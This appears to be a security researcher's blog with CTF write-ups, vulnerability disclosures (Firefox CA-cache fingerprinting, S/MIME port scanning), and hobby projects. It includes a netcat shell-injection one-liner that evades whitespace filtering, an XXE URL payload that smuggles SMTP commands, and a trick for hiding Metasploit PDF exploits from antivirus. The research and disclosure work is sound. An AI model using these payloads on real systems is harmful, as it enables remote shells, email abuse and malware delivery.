shift or die

security. photography. foobar.

mrmcd CTF writeup: Friendly Machine

I recently participated in the MRMCD CTF. My favourite challenge was called “Friendly Machine”.

It consisted of a Python script which reads code from a Base64-encoded JSON-encoded array. The array itself looks something like this:

[
   {
      "ZeiteesohpiefeeyuHah" : "start",
      "Jeicheidahmeichetaik" : "ZeiteesohpiefeeyuHah"
   },
   {
      "sebeeluoCaedohlaehoh" : "ZERO",
      "IeCilahWaishaibiemoo" : 0,
      "Jeicheidahmeichetaik" : "ayahshecieleeYeingis"
   },
   {
      "IeCilahWaishaibiemoo" : 0,
      "sebeeluoCaedohlaehoh" : "RES",
      "Jeicheidahmeichetaik" : "ayahshecieleeYeingis"
   },
   {
      "ZeiteesohpiefeeyuHah" : "lencheck_start",
      "Jeicheidahmeichetaik" : "ZeiteesohpiefeeyuHah"
   },
[...]

Hmmm, that kinda looks like variable assignments, labels, etc.? And sure enough, the main friendly machine code has a dictionary for variables and based on the entry in the current position in the code (yes, there are jumps, so it’s not necessarily linear) assignments or operations happen. Our goal is to end up in a position where we return 0, since then the flag is correct.

First I set out to see if I can add some debug output to the execution, but that turned out to be rather confusing than helpful. Static analysis it is, then. I wrote a script to output the code in a more readable form:

i = 0

for i in range(len(code)):
    if code[i]["Jeicheidahmeichetaik"] == "bohxudohMeiteipiVaeZ":
        print(code[i]["yuGhoxeebaivaiteifai"] + "=pwbyte")
    elif code[i]["Jeicheidahmeichetaik"] == "chahghoaThoariaCowoh":
        print("ret " + str(code[i]["shumeesaiXoohigheari"]))
    elif code[i]["Jeicheidahmeichetaik"] == "ayahshecieleeYeingis":
        print(code[i]["sebeeluoCaedohlaehoh"] + "=" + str(code[i]["IeCilahWaishaibiemoo"]))
    elif code[i]["Jeicheidahmeichetaik"] == "DaweeyeiZaiceemeitah":
        print(code[i]["iesheiQuiphaipohquei"] + "=" + code[i]["Koobaicahxaexeicohno"] + "+" + code[i]["OhNgaesiequievaijaca"])
    elif code[i]["Jeicheidahmeichetaik"] == "geethahshiuxiyeitooH":
        print(code[i]["SheixienaigeeSaeHahC"] + "=" + code[i]["looheThedohsouquoogo"] + "-" + code[i]["UaYaDaeciekeemeehein"])
    elif code[i]["Jeicheidahmeichetaik"] == "uDohngaephaethahngah":
        print(code[i]["ietaiviexuaniequeZie"] +"="+ code[i]["saichuqueiShieRaeYie"] + "^" + code[i]["RahThiefudeimahhohch"])
    elif code[i]["Jeicheidahmeichetaik"] == "AhkiexaZeishieKohqui":
        print(code[i]["eepuozeeviexoopieMoi"] + "=" + code[i]["aageenuxeLaeBaidoaru"] + "|" + code[i]["PeGoawoowiuthoobaaTh"])
    elif code[i]["Jeicheidahmeichetaik"] == "riatheihoxooziitahGo":
        print(code[i]["eishaBeiwiYahSiexaem"] + "=" + code[i]["IsichaikuaNeiHahRaiH"] + "&" + code[i]["thuyaecenaethiPochie"])
    elif code[i]["Jeicheidahmeichetaik"] == "ieZieyiechooTeilaexe":
        for equahSohNeohoonohphu in code:
            if equahSohNeohoonohphu.has_key("ZeiteesohpiefeeyuHah"):
                if equahSohNeohoonohphu["ZeiteesohpiefeeyuHah"] == code[i]["aNaeNeeyooCeezaiGeeb"]:
                    print("jmp " + str(code.index(equahSohNeohoonohphu)+1) + ' if ' + code[i]["ozeeleephuiGaechaiSh"] + '==0')
                    break
    else:
        print("nop")
    i += 1

This leads to the following “code” (first few lines):

  1	nop
  2	ZERO=0
  3	RES=0
  4	nop
  5	ONE=1
  6	COUNT=0
  7	nop
  8	x=pwbyte
  9	x=x+ONE
 10	jmp 13 if x==0
 11	COUNT=COUNT+ONE
 12	jmp 7 if ZERO==0
 13	nop
 14	x=28
 15	x=COUNT-x
 16	jmp 21 if x==0
 17	jmp 18 if ZERO==0
 18	nop
 19	o=-1
 20	ret o
 21	nop
 22	ohhayeexongoakaeVuph=0
 23	jmp 24 if ZERO==0
 24	nop

Note that “pwbyte” represents “read a byte from the input and return -1 if we read beyond the string length”. So we read byte by byte and increase COUNT by ONE. Line 14 to 16 show us that our flag needs to be 28 characters long, since otherwise we would return -1.

Let’s continue:

 25	A=pwbyte
 26	B=77
 27	C=A-B
 28	RES=RES|C
 29	A=pwbyte
 30	B=82
 31	C=A-B
 32	RES=RES|C
 33	A=pwbyte
 34	B=77
 35	C=A-B
 36	RES=RES|C

Oh, 77, 82, 77, or M, R, M again. This looks good! And from the equations we can see that our input needs to be exactly these values in order to keep RES (which will be returned at the very end) nicely at 0.

The code continues similarly, but gets a bit more complex:

[...]
 49	X=pwbyte
 50	t=7
 51	Y=X-t
 52	t=90
 53	C=Y^t
 54	RES=RES|C
 55	X=pwbyte
 56	t=15
 57	Y=X-t
 58	t=80
 59	C=Y^t
[...]
 79	X=pwbyte
 80	t=999
 81	Y=t-X
 82	t=900
 83	C=Y^t
 84	RES=RES|C
 85	X=pwbyte
 86	t=1
 87	Y=t+X
 88	t=102
 89	C=Y-t
 90	RES=RES|C
[...]

One could solve all these things algebraically, but luckily for me my “decompiler” outputs syntactically valid Python, so I was lazy and brute-forced each character by looping over possible pwbyte values and checking when RES ended up being 0.

During the CTF I did this manually with a bit of copy-and-paste and running python, but for the sake of “AUTOMATE ALL THE THINGS!!111ELF”, here’s a script that does the same:

#!/usr/bin/env python3

import sys

START_CODE = "for pwbyte in range(128):\n\tRES = 0\n"

code = open('code', 'r').readlines()

current_block = START_CODE
# start at line 25, after the length check
for i in range(24, len(code)):
    current_block += "\t" + code[i]
    if 'RES=' in code[i]: # RES gets assigned, we want this to be 0
        current_block += "\tif RES == 0:\n"
        current_block += "\t\tprint(chr(pwbyte), end='')\n"
        sys.stderr.write("Current code block:\n" + current_block)
        exec(current_block) # don't run on untrusted input ;-)
        current_block = START_CODE
print()

Running it gives us the flag:

$ ./bruteforce.py 2>/dev/null
MRMCD{a_processor_in_python}

mrmcd CTF writeup: Once Upon A Time

I recently participated in the MRMCD CTF, which had a challenge called “Once Upon A Time”. The hint for the binary was that it will simply print the flag … but some patience might be required.

Since I am way less binary reverse-engineering ninja than might appear from the scoreboard, I threw the binary into the Snowman decompiler.

Here, I could recognize the following structure quickly:

v4 = 0;
do {
	v5 = 1;
	while (v5) {
		++v5;
	}
	--v4;
} while (v4 != 77);
fun_640("%d done\n", 0, 64, "%d done\n", 0, 64);

v6 = 0;
do {
	v7 = 1;
	while (v7) {
		++v7;
	}
	--v6;
} while (v6 != 82);
fun_640("%d done\n", 1, 64, "%d done\n", 1, 64);

[...]

So the challenge hint was technically correct, the inner while loop would run until the (int64) v5 would overflow and become 0, while the outer loop would terminate eventually when v4 was decreased from 2**64 to 77.

At this point, one could have patched the decrements into increments and vice-versa, but that seemed quite tedious.

If you squint closely though, you can notice that the desired values for v4 and v6 correspond to the ASCII characters M and R, the usual start of a flag. During the CTF I just proceeded to manually convert them and concatenated them, but for the sake of (useless?) automation here’s a one-liner to get the flag:

$ grep '} while (v' once_upon_a_time.c | cut -d'=' -f2 | cut -d ')' -f1 | python -c 'import sys; chars = sys.stdin.readlines(); print("".join([chr(int(c, 0)) for c in chars]))'
MRMCD{so_sorry_for_the_delay}

Fingerprinting Firefox users with cached intermediate CA certificates (#fiprinca)

[TLDR: Firefox caches intermediate CA certificates. A third-party website can infer which intermediates are cached by a user. To do this, it loads content from incorrectly configured hosts (missing intermediate in the provided certificate chain) and observes whether they load correctly (yes: corresponding intermediate was cached, no: it was not). Check out my proof of concept using more than 300 intermediate CAs. This technique can be used to gain a fingerprint for a user but also leaks semantic information (mainly geographical). Since Private Browsing mode does not isolate the cache, it can be used to link a Private Browsing user to her real profile. Furthermore, attackers could force users to visit correctly configured websites with unusal intermediates and thus set a kind of supercookie. This has been reported as #1334485 in the Mozilla bug tracker.]

The idea

A few months ago, I was sitting in Ivan Ristić’s course »The Best TLS Training in the World« (which I highly recommend, by the way). One thing Ivan was mentioning is the fact that probably the most common misconfiguration in setting up a TLS webserver is forgetting to deliver the complete certificate chain. Let me use some pictures to explain it. Here is the correct case:

Correctly configured

In case the server is misconfigured, the situation looks as follows:

Incorrectly configured

An idea came to my mind: if the behaviour is different depending on the cache, can I observe that from the outside? A quick look around on ssllabs.com for a site with incomplete chain and a <img src=https://brokensite/favicon.ico onload=alert(1) onerror=alert(2)> showed me that this was indeed feasible in Firefox (Chrome and Internet Explorer somehow both magically load the image/site even when the chain is not delivered − possibly using the caIssuer extension?). Interestingly enough, the cached CAs from the main profile were also used in Private Browsing mode.

Gathering data

Lurking around ssllabs.com to find new hosts with incomplete chains did not sound like a fun idea, and I guess Qualys would not have been too happy if I automated the process. So I had to come up with a better way to gather hosts for a proof of concept. Luckily, there are public datasets of the TLS server landscape available. The two that I ended up using were the Censys.io scan (free researcher account needed) and the Rapid7 Project Sonar (free to download) ones.

In the first step, I wanted to identify all possible intermediate CA certificates that chain up to a trusted root CA. For this, I downloaded the Root CA extract provided by the curl project. Then I looked at all CA certificates in the datasets and checked with openssl verify to see if they are a direct intermediate of one of the trusted roots. To further identify intermediate CAs that chain up to a trusted root in a longer path, I ran this process in an iterative fashion using the root CAs and already identified intermediates until no more new intermediates were found in the datasets. I ended up with 3366 individual CA certificates that chain up to a trusted root (1931 on the first level, 1286 on the second level, 92 on the third level and 57 on the fourth level).

The next step was identifying websites which were misconfigured. For this, the Project Sonar data came in handy as they scan the complete IPv4 internet and record the delivered certificate chain for each IP on port 443. Since they provide the certificates individually and the scan data only contains hashes of the chain elements, I first had to import all the certificates into a SQLite database in order to quickly look them up by hash. Despite ending up with a database file of roughly 100 GB, SQLite performed quite nicely. I then processed this data by looking at all certificates to see if they contained an issuer (by looking at the Authority Key Identifier extension) that was present in my set of CAs, but not delivered in the chain. If this was the case, I had identified the IP address of a misconfigured host. Now it was necessary to see if the certificate used a hostname which actually resolved to that IP address. If that was the case, I had a candidate for an incorrectly configured webserver.

The last step was to identify a working image on that webserver which can be loaded. I considered several options but settled on just loading the website in Firefox and observing using Burp which images were loaded. This left me with a Burp state file of several gigabytes and a list of plenty of URLs for more than 300 individual intermediate CAs.

The proof of concept

I used this list of URLs to build a proof of concept using elm, my favourite way to avoid writing JavaScript these days. Here is how a part of the output (and Firebug’s Net Panel to see which images are loaded) looks for me:

PoC output

Note that it might occasionally contain false positives or false negatives, since the servers that are used for testing are not under my control and might change their TLS configuration and/or location of images.

If you run the proof of concept yourself, you will be presented with an option to share your result with me. Please do so − I am grateful for every data point obtained in this way to see what additional information can be extracted from it (geographical location? specific interests of the user? etc.).

Further ideas

One thing that is pretty easy to see is that this technique could also be used in a more active way by forcing users to visit correctly configured websites from unusual intermediates. Note that for example the PKI of the »Deutsches Forschungsnetzwerk« comes in handy here, as it provides literally hundreds of (managed) intermediates for their members, including lots of tiny universities or research institutes. One could force to user to cache a certain subset of unusal intermediates and then check later from a different domain which intermediates are set. This is of course not foolproof, since users might visit correctly configured websites from those intermediates and thus flip bits from 0 to 1. Error-correcting codes could be used here (with the tradeoff of having to use more intermediates) to deal with that problem.

In addition to the purely »statistical« view of having a fingerprint with a sequence of n bits representing the cache status for each tested CA, the fingerprint also contains additional semantic information. Certain CAs have customers mostly in one country or region, or might have even more specific use-cases which let’s you infer even more information − i.e. a user who has the »Deutsche Bundestag CA« cached is most probably located in Germany and probably at least somewhat interested in politics.

From an attacker’s perspective, this could also be used to check if the browser is running inside a malware analysis sandbox (which would probably have none or very few of the common intermediates cached) and delivering different content based on that information.

Solutions

I reported the problem on January 27th, 2017 to Mozilla in bug #1334485. The cleanest solution would obviously be to not connect to incorrectly configured servers, regardless of whether the intermediate is cached or not. Understandably, Mozilla is reluctant to implement that without knowing the impact. Thus bug #1336226 has been filed to implement some related telemetry − let’s see how that goes.

From a user’s perspective, at the moment I can only recommend to regularly clean up your profile (by creating a fresh one, cleaning it up from the Firefox UI or using the certutil command line tool). Alternatively, blocking third-party requests with an addon such as Request Policy might be useful since the attack obviously needs to make (a lot of) third-party requests.

SMTP over XXE − how to send emails using Java's XML parser

I regularly find XML eXternal Entity (XXE) vulnerabilities while performing penetration tests. These are particularly often present in Java-based systems, where the default for most XML parsers still is parsing and acting upon inline DTDs, even though I have not seen a single use case where this was really neceassary. While the vulnerability is useful for file disclosures (and Java is nice enough to also provide directory listings) or even process listings (via /proc/pid/cmdline), recently I stumbled over another interesting attack vector when using a Java XML parser.

Out of curiosity, I looked at what protocols would be supported in external entities. In addition to the usual such as http and https, Java also supports ftp. The actual connection to the FTP server is implemented in sun.net.ftp.impl.FtpClient. It supports authentication, so we can put usernames and passwords in the URL such as in ftp://user:password@host:port/file.ext and the FTP client will send the corresponding USER command in the connection.

The (presumably ancient) code has a bug, though: it does not verify the syntax of the user name. RFC 959 specifies that a username may consist of a sequence of any of the 128 ASCII characters except <CR> and <LF>. Guess what the JRE implementers forgot? Exactly − to check for the presence of <CR> or <LF>. This means that if we put %0D%0A anywhere in the user part of the URL (or the password part for that matter), we can terminate the USER (or PASS) command and inject a new command into the FTP session.

While this may be interesting on its own, it allows us to do something else: to speak SMTP instead of FTP. Note that for historical reasons, the two protocols are structurally very similar. For example, on connecting, they both send a reply with a 220 code and text:

$ nc ftp.kernel.org 21
220 Welcome to kernel.org
$ nc mail.kernel.org 25
220 mail.kernel.org ESMTP Postfix

So, if we send a USER command to a mail server instead of a FTP server, it will answer with an error code (since USER is not a valid SMTP command), but let us continue with our session. Combined with the bug mentioned above, this allows us to send arbitrary SMTP commands, which allows us to send emails. For example, let’s set the URL to the following (newlines added for readability):

ftp://a%0D%0A
EHLO%20a%0D%0A
MAIL%20FROM%3A%3Ca%40example.org%3E%0D%0A
RCPT%20TO%3A%3Calech%40alech.de%3E%0D%0A
DATA%0D%0A
From%3A%20a%40example.org%0A
To%3A%20alech%40alech.de%0A
Subject%3A%20test%0A
%0A
test!%0A
%0D%0A
.%0D%0A
QUIT%0D%0A
:a@shiftordie.de:25/a

When sun.net.ftp.impl.FtpClient connects using this URL, the following commands will be sent to the mail server at shiftordie.de:

USER a<CR><LF>
EHLO a<CR><LF>
MAIL FROM:<a@example.org><CR><LF>
RCPT TO:<alech@alech.de><CR><LF>
DATA<CR><LF>
From: a@example.org<LF>
To: alech@alech.de<LF>
Subject: test<LF>
<LF>
test!<LF><CR><LF>
.<CR><LF>
QUIT<CR><LF>

From Java’s perspective, the “FTP” connection fails with a sun.net.ftp.FtpLoginException: Invalid username/password, but the mail is already sent.

This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing. It even allows for sending attachments, since the URL length seems to be unrestricted and only limited by available RAM (parsing a 400MB long URL did take more than 32 GBs of RAM for some reason, though ;-)).

A portscan by email − HTTP over X.509 revisited

Disclaimer: This was originally posted on blog.nruns.com. Since n.runs went bankrupt, the blog is defunct now. I reposted this here in July 2015 to preserve it for posteriority.

The history

Design bugs are my favourite bugs. About six years ago, while I was working in the Public Key Infrastructure area, I identified such a bug in the X.509 certificate chain validation process (RFC 5280). By abusing the authority information access id-ad-caissuers extension, it allowed for triggering (blind) HTTP requests when (untrusted, attacker-controlled) certificates were validated. Microsoft was one of the few vendors who actually implemented that part of the standard and Microsoft CryptoAPI was vulnerable against it. Corresponding advisories (Office 2007, Windows Live Mail and Outlook) and a whitepaper were released in April 2008.

This issue was particularly interesting because it could be triggered by an S/MIME-signed email when opened in Microsoft Outlook (or other Microsoft mail clients using the CryptoAPI functionality). This allowed attackers to trigger arbitrary HTTP requests (also to internal networks) but not gaining any information about the result of the request. Also, because the request was done using CryptoAPI and not in a browser, it was impossible to exploit any kind of Cross Site Request Forgery issues in web applications, so the impact of the vulnerability was quite limited. In fact, I would consider this mostly privacy issue because the most interesting application was to find out that an email had been opened (and from which IP address and with which version of CryptoAPI), something that was otherwise (to my knowledge) pretty much impossible in Outlook (emailprivacytester.com, a very interesting service with many tests for email privacy issues seems to confirm that).

Revisiting the issue

In May 2012, I revisited the issue to see if something that I had been thinking about previously could be implemented – leveraging the issue to do port scanning on internal hosts by alternating between internal and external HTTP requests and measuring the timing distance on the (attacker-controlled) external host. It turned out that in a specific combination of nested S/MIME signatures with particularly long URLs (about 3500 characters, don’t ask my why exactly they are needed), one can actually observe a difference in timing between an open port or a closed port.

To test this, URLs that are triggered by the email would for example look similar to the following:

  1. http://[attacker_server]/record_start?port=1&[3500*A]
  2. http://[internal_target_ip]:1/[3500*A]
  3. http://[attacker_server]/record_stop?port=1&[3500*A]
The scripts »record_start« and »record_stop« on the server are used to measure the time difference between the two external requests (1 and 3), with which we can tell (roughly) how long the internal request to port 1 on the internal target IP took.

Testing showed that in case the port is open, the time difference measured between the two external requests was significantly below one second, while if the port was closed, it was a bit above one second.

Unfortunately, we are not able to observe this for all possible ports. The timing difference for some HTTP request to a list of well-known ports was short regardless of whether they are open or closed, making it impossible to determine their state. My current assumption is that this is because the HTTP client library used by CryptoAPI does not allow connections on those ports to avoid speaking HTTP(S) on them (similar to browsers which typically make it impossible to speak HTTP on port 25).

A single email can be used to scan the 50 most-used (as determined by nmap) ports on a single host. A proof-of-concept which scans 127.0.0.1 has been implemented and can be tried out by sending an empty email to smime-http-portscan@klink.name. You will receive an automatic reply with an S/MIME-signed message which when opened will trigger a number of HTTP requests to ports on local host and a data logger running on my webserver. After a few minutes, you can check on a web interface to see which ports are open and which ones are closed. Sometimes, your Exchange mail server might prevent the test email from being delivered though because it contains a lot of nested MIME parts (try again with a more relaxed mailserver then ;-)).

Problem solved

After repeatedly bugging the Microsoft Security Response team about the issue (and accidentally discovering an exploitable WriteAV issue when too many S/MIME signatures were used – MS13-068, fixed in the October 2013 patch day), this has now been fixed with the November 2013 patch day release (CVE-2013-3870). In case the id-ad-caissuers functionality is actually needed in an organization, the functionality can be turned on again, though – with the risk of still being vulnerable to this issue.

Geohashing with GPX files and QLandkarte GT

Because of some scientists near the south pole, I recently re-discovered geohashing. As I wanted an easy way to see the most recent hash points (and the upcoming one(s), since I live east of W30), I did some automation.

The different online services are pretty nice but they did not have all the features I wanted to have. Also, I have grown quite fond of the ability to have an OpenStreetMap available offline (not necessarily because I am offline that much, but because it makes looking at the map so much faster). I use QLandkarte GT and the Openmtbmap.org map, as it shows cycling routes quite nicely.

QLandkarte GT supports loading GPX files, so the first thing I needed was something to produce GPX files for a given graticule (and date, or if no date is specified, for all upcoming ones). I wanted something similar to the Small Hash Inquiry Tool, as it shows you the hash points of the surrounding graticules as well. I took an evening to hack something together using Ruby, Sinatra and relet’s JSON web service. I decided to host it on Heroku, as it was easy and free. You can find out how to use it at http://geohashing-gpx.heroku.com. It should also work quite nicely with GPS devices with GPX support (or with gpsbabel, for that matter). The source is available at git://git.alech.de/geohashing_gpx.git, if you are curious.

But back from devices to the desktop, I wanted an easy way to view this in QLandkarte GT and keep it updated. Luckily, QLandkarte GT offers a sort of reload feature with the “-m” command line option. I’ve written a small wrapper which makes this available using a signal handler:

$ cat bin/qlandkartegt_reloadable.rb 
#!/usr/bin/env ruby

f = IO.popen("qlandkartegt -m0 #{ARGV.join(' ')}", 'w')

trap('USR1') do
  f.write 'A'
end
Process.wait
So now I can do something along the lines of:
qlandkartegt_reloadable.rb ~/gps/geohash.gpx
wget http://geohashing-gpx.heroku.com/multi/1/49/8 -O ~/gps/geohash.gpx && pkill -USR1 -f qlandkartegt_reloadable.rb
to keep the data shown in my (always open) QLandkarte GT up to date.

The only things on my TODO list for this are timezones (it works using UTC at the moment, which is fine for me since I am pretty close to UTC, but may be annoying if you are not that close) and the possible addition of business holidays to figure out if tomorrow will have new DJIA opening value or not (if anyone has a good, free source, please let me know). I might work on this or I might not, chances are higher if someone bothers me to do so.

Shell injection without whitespace

In a recent penetration test, I was in the situation where I could inject code into a Perl system call, but whitespace (\s+) was filtered beforehand (probably not for security but rather for functionality reasons).

In looking for a way to still execute more than a parameterless binary (which of course would be a possible solution if I had had a way to put a custom binary on the system), I stumbled over the $IFS variable, which is the “Internal Field Seperator” with default value “<space><tab><newline>”. It also works fine as a separator for commands, so you can inject something like:

nc${IFS}-l${IFS}-p1337${IFS}-e/bin/sh
without using a single whitespace character. May it come in handy for you one day.

Moving to Octopress

My blog has been running on Angerwhale, a Catalyst-based Perl blog framework. Although it worked fine for me from a usability point of view (plain text files plus some meta-data), it was way to slow to deal with a few concurrent hits. I never noticed until @chaosupdates linked to my blog post about @cryptofax2tweet and the server more or less exploded in (virtual) flames.

I made an attempt to change from the standalone server (well, no surprise that it did not deal well with load there but that was fine for a long time for my little blog here) to a real modperl-based installation, but that did not help much.

As I am more confident with Ruby then Perl nowadays I started looking for something to change to. A static solution would of course be nice to have because of the speed factor, so after some searching and #followerpower, I stumbled over Octopress, which uses the Jekyll framework.

I converted all my Angerwhale posts to Octopress using a small Ruby script (ping me if you are interested). The comments from the old site are still missing, but I am considering converting them with Jekyll::StaticComments plugin.

The plan for now is to try to blog a bit more than before, maybe it should be on my list of new year's resolutions (or maybe not as not to jinx it ;-).

Introducing CryptoFax2Tweet

Meet @cryptofax2tweet, a new Twitter account I run. So, what is so special about this account? As the name suggests, it can be used to tweet by sending an encrypted QR code using a fax, for example when your government decides to turn off the internet. In case you are not interested in the technical details on how it works and just want to use it, you can download the cryptofax.pdf file and open it in Adobe Reader. A one page user's guide is also available.

So, how does this work? Recent PDF versions support the XML Forms Architecture (XFA), which I've been playing with lately. It includes all kind of funny things, such as its own language (because having both Javascript and Flash in Reader is not enough, apparently), FormCalc. It is apparently not more useful than Javascript except if you want to generate arbitrary HTTP requests.

But I am digressing. One of the more interesting features of XFA is the possibility to create all kinds of barcodes, both one- and two-dimensional. The list of different types you can create in the specification is about five pages long(!). Also, the specification claims that the content of the barcode can be encrypted before creating it using an RC4/RSA hybrid encryption.

I had recently read about Google's @speak2tweet account and liked the idea but not the Medienbruch — the change from one medium (voice) to another (text). So I thought about implementing something using XFA which would allow people to send tweets via fax.

One obstacle on the way was finding out that Adobe does not want you to create dynamic 2D barcodes if you do not have the license for it. Unluckily, if you do not know this and modify the rawValue attribute of the barcode field after the form has rendered, you just get to see a grey block instead of the barcode and keep wondering whether Adobe just broke the functionality. Also, debugging Javascript code if you only have Adobe Reader is less funny than you think. Once I figured that out, I realised that you can ask for the dynamic information in the initialize event handler using app.response() and create the barcode at that point (not sure whether Adobe would consider this a bug or a feature).

After that was solved, I looked into encrypting the content of the tweet. Note that the encryption just helps against an attacker who only monitors the phone lines and not the @cryptofax2tweet account. Still, it might help people who have printed out the fax and it gets intercepted before it has been faxed. Unluckily, it looks like this particular functionality from the specification has not been implemented in Reader (the fact that the LiveCycle® Designer ES Scripting Reference does not talk about it at all points in this direction, too).

Luckily, there was no need to implement the cryptography myself, as there is already a pretty nice BSD-licensed RSA implementation for Javascript. A few patches later to fix some Reader-specific oddities, I was able to RSA-encrypt a tweet. As a tweet can only be 140 characters (thus at most 560 bytes in UTF-8), I just used a 4096 bit RSA key (not for security, just for convenience reasons :-). This would enable us to encode only at most 128 characters of four-byte UTF-8 characters (e.g. Klingon in the private use area). I accepted this trade-off and in the end it turned out that inputting four-byte UTF-8 characters using app.response() was impossible anyways.

The other end of the service needs to decode the QR code, decrypt the content and tweet it. This part was a lot easier than the PDF part, as it could be implemented in less than 50 lines using Ruby and the ZBar barcode library. A fax number was thankfully provided by AS250.net so that I only needed to deal with emails from the fax2mail gateway.

If you managed to read this far, you might be interested in the code, which is available in a Git repository (or see the Gitweb interface).

Evading AVs using the XML Data Package (XDP) format

At work, I recently obtained a copy of iText in Action, 2nd Edition because I have been playing with PDF a bit lately and the book not only offers advice on how to use the Java PDF library iText but also some background on PDF internals and the new features in PDF 1.7.

One thing I stumbled about in the book was that there is a format called XML Data Package (XDP) which can be used to represent a PDF as XML. So of course I downloaded the specification and went to play with it a bit.

Acrobat Reader opens XDP files just fine if they have an .xdp file extension or if they are sent by a webserver with the application/vnd.adobe.xdp+xml MIME type. It was an easy exercise to write a small script to convert a given PDF to an XDP file (basically it's just an XML header, the Base64-encoded PDF and an XML footer).

I was wondering how Antivirus products would react to a malware PDF file in disguise as a XDP. Thus, I generated a PDF containing an exploit using Metasploit and uploaded it to VirusTotal. 13 out of 43 products classified the PDF as malware. Interestingly enough, 0/43 recognized the equivalent XDP file as malware (and neither did a few mail gateways I tested).

I've just submitted a feature request for Metasploit to add XDP support and added my pdf2xdp.rb script as a starting point. Let's see where this is heading.